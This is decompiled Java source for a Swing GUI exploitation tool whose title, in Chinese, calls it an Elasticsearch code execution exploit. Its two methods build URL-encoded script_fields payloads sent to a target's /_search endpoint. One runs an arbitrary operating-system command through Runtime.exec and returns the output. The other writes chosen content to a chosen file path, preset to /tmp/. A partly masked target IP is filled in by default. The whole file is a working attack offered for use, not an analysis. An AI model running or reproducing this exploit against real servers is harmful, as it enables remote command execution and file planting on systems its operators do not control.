package org.javaweb.elasticsearch.ui;

import com.google.gson.Gson;
import com.google.gson.reflect.TypeToken;
import java.awt.Dimension;
import java.awt.EventQueue;
import java.awt.Toolkit;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.swing.GroupLayout;
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTabbedPane;
import javax.swing.JTextArea;
import javax.swing.JTextField;
import javax.swing.LayoutStyle;
import org.apache.commons.io.IOUtils;
import org.javaweb.elasticsearch.util.HttpRequestUtil;

/* loaded from: input_file:org/javaweb/elasticsearch/ui/MainFrame.class */
public class MainFrame extends JFrame {
    private static final long serialVersionUID = 1;
    private JButton jButton1;
    private JButton jButton2;
    private JLabel jLabel1;
    private JLabel jLabel3;
    private JLabel jLabel4;
    private JLabel jLabel5;
    private JPanel jPanel1;
    private JScrollPane jScrollPane1;
    private JScrollPane jScrollPane2;
    private JTabbedPane jTabbedPane1;
    private JTextArea jTextArea1;
    private JTextArea jTextArea2;
    private JTextField jTextField1;
    private JTextField jTextField3;
    private JTextField jTextField4;
    private JTextField jTextField5;

    public MainFrame() {
        initComponents();
    }

    private void initComponents() {
        this.jLabel1 = new JLabel();
        this.jTextField1 = new JTextField();
        this.jLabel3 = new JLabel();
        this.jTextField3 = new JTextField();
        this.jButton1 = new JButton();
        this.jTabbedPane1 = new JTabbedPane();
        this.jScrollPane1 = new JScrollPane();
        this.jTextArea1 = new JTextArea();
        this.jPanel1 = new JPanel();
        this.jLabel4 = new JLabel();
        this.jTextField4 = new JTextField();
        this.jLabel5 = new JLabel();
        this.jTextField5 = new JTextField();
        this.jButton2 = new JButton();
        this.jScrollPane2 = new JScrollPane();
        this.jTextArea2 = new JTextArea();
        setDefaultCloseOperation(3);
        this.jLabel1.setText("Host:");
        setTitle("Elasticsearch 代码执行漏洞利用工具 -p2j.cn");
        this.jTextField1.setText("http://61.xx.xx.109:9200/");
        this.jLabel3.setText("CMD:");
        this.jTextField3.setText("whoami");
        this.jButton1.setText("命令执行");
        this.jButton1.addActionListener(new ActionListener() { // from class: org.javaweb.elasticsearch.ui.MainFrame.1
            public void actionPerformed(ActionEvent actionEvent) {
                MainFrame.this.jButton1ActionPerformed(actionEvent);
            }
        });
        this.jTextArea1.setColumns(20);
        this.jTextArea1.setRows(5);
        this.jTextField4.setText("/tmp/");
        this.jTextField5.setText("p2j.txt");
        this.jTextArea2.setText("p2j.test");
        this.jScrollPane1.setViewportView(this.jTextArea1);
        this.jTabbedPane1.addTab("命令执行", this.jScrollPane1);
        this.jLabel4.setText("FilePath:");
        this.jLabel5.setText("FileName:");
        this.jButton2.setText("保存");
        this.jButton2.addActionListener(new ActionListener() { // from class: org.javaweb.elasticsearch.ui.MainFrame.2
            public void actionPerformed(ActionEvent actionEvent) {
                MainFrame.this.jButton2ActionPerformed(actionEvent);
            }
        });
        this.jTextArea2.setColumns(20);
        this.jTextArea2.setRows(5);
        this.jScrollPane2.setViewportView(this.jTextArea2);
        GroupLayout groupLayout = new GroupLayout(this.jPanel1);
        this.jPanel1.setLayout(groupLayout);
        groupLayout.setHorizontalGroup(groupLayout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(groupLayout.createSequentialGroup().addContainerGap().addComponent(this.jLabel4).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField4, -2, 200, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jLabel5).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField5, -2, 200, -2).addGap(18, 18, 18).addComponent(this.jButton2).addContainerGap(66, 32767)).addComponent(this.jScrollPane2, GroupLayout.Alignment.TRAILING));
        groupLayout.setVerticalGroup(groupLayout.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(groupLayout.createSequentialGroup().addContainerGap().addGroup(groupLayout.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel4).addComponent(this.jTextField4, -2, -1, -2).addComponent(this.jLabel5).addComponent(this.jTextField5, -2, -1, -2).addComponent(this.jButton2)).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jScrollPane2, -1, 381, 32767)));
        this.jTabbedPane1.addTab("写文件", this.jPanel1);
        GroupLayout groupLayout2 = new GroupLayout(getContentPane());
        getContentPane().setLayout(groupLayout2);
        groupLayout2.setHorizontalGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(groupLayout2.createSequentialGroup().addContainerGap().addComponent(this.jLabel1).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField1, -2, 250, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jLabel3).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTextField3, -2, 269, -2).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jButton1).addContainerGap()).addComponent(this.jTabbedPane1));
        groupLayout2.setVerticalGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.LEADING).addGroup(groupLayout2.createSequentialGroup().addContainerGap().addGroup(groupLayout2.createParallelGroup(GroupLayout.Alignment.BASELINE).addComponent(this.jLabel1).addComponent(this.jTextField1, -2, -1, -2).addComponent(this.jLabel3).addComponent(this.jTextField3, -2, -1, -2).addComponent(this.jButton1)).addPreferredGap(LayoutStyle.ComponentPlacement.RELATED).addComponent(this.jTabbedPane1)));
        pack();
        int i = Toolkit.getDefaultToolkit().getScreenSize().width;
        int i2 = Toolkit.getDefaultToolkit().getScreenSize().height;
        Dimension preferredSize = getPreferredSize();
        setBounds((i / 2) - (preferredSize.width / 2), (i2 / 2) - (preferredSize.height / 2), preferredSize.width, preferredSize.height);
    }

    private Map<String, String> execute() throws UnsupportedEncodingException {
        HashMap hashMap = new HashMap();
        hashMap.put("source", "{%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nString%20str%20=%20\\%22\\%22;BufferedReader%20br%20=%20new%20BufferedReader(new%20InputStreamReader(Runtime.getRuntime().exec(\\%22" + URLEncoder.encode(this.jTextField3.getText(), "UTF-8") + "\\%22).getInputStream()));StringBuilder%20sb%20=%20new%20StringBuilder();while((str=br.readLine())!=null){sb.append(str%2b%5C%22%5Cr%5Cn%5C%22);}sb.toString();%22}}}");
        return hashMap;
    }

    private Map<String, String> save() {
        HashMap hashMap = new HashMap();
        hashMap.put("source", "{%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\\nimport%20java.io.*;\\nFile%20f%20=%20new%20File(%5C%22" + (String.valueOf(this.jTextField4.getText()) + "/" + this.jTextField5.getText()).replaceAll("\\\\", "/").replaceAll("/+", "/") + "%5C%22);if(f.exists()){%5C%22exists%5C%22.toString();}BufferedWriter%20bw%20=%20new%20BufferedWriter(new%20OutputStreamWriter(new%20FileOutputStream(f),%5C%22UTF-8%5C%22));bw.write(%5C%22" + this.jTextArea2.getText() + "%5C%22);bw.flush();bw.close();if(f.exists()){%5C%22success%5C%22.toString();}%22}}}");
        return hashMap;
    }

    private void getResult(String str, JTextArea jTextArea) {
        jTextArea.setText(new StringBuilder().append(((Map) ((Map) ((List) ((Map) ((Map) new Gson().fromJson(str, new TypeToken<Map<String, Object>>() { // from class: org.javaweb.elasticsearch.ui.MainFrame.3
        }.getType())).get("hits")).get("hits")).get(0)).get("fields")).get("exp")).toString());
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void jButton1ActionPerformed(ActionEvent actionEvent) {
        String str = "";
        try {
            str = HttpRequestUtil.getRequest(String.valueOf(this.jTextField1.getText()) + "/_search", execute(), 10000);
            getResult(str, this.jTextArea1);
        } catch (Exception e) {
            this.jTextArea1.setText(String.valueOf(e.toString()) + IOUtils.LINE_SEPARATOR_WINDOWS + str);
        }
    }

    /* JADX INFO: Access modifiers changed from: private */
    public void jButton2ActionPerformed(ActionEvent actionEvent) {
        try {
            getResult(HttpRequestUtil.getRequest(String.valueOf(this.jTextField1.getText()) + "/_search", save(), 10000), this.jTextArea2);
        } catch (Exception e) {
            this.jTextArea2.setText(e.toString());
        }
    }

    public static void main(String[] strArr) {
        EventQueue.invokeLater(new Runnable() { // from class: org.javaweb.elasticsearch.ui.MainFrame.4
            @Override // java.lang.Runnable
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }
}
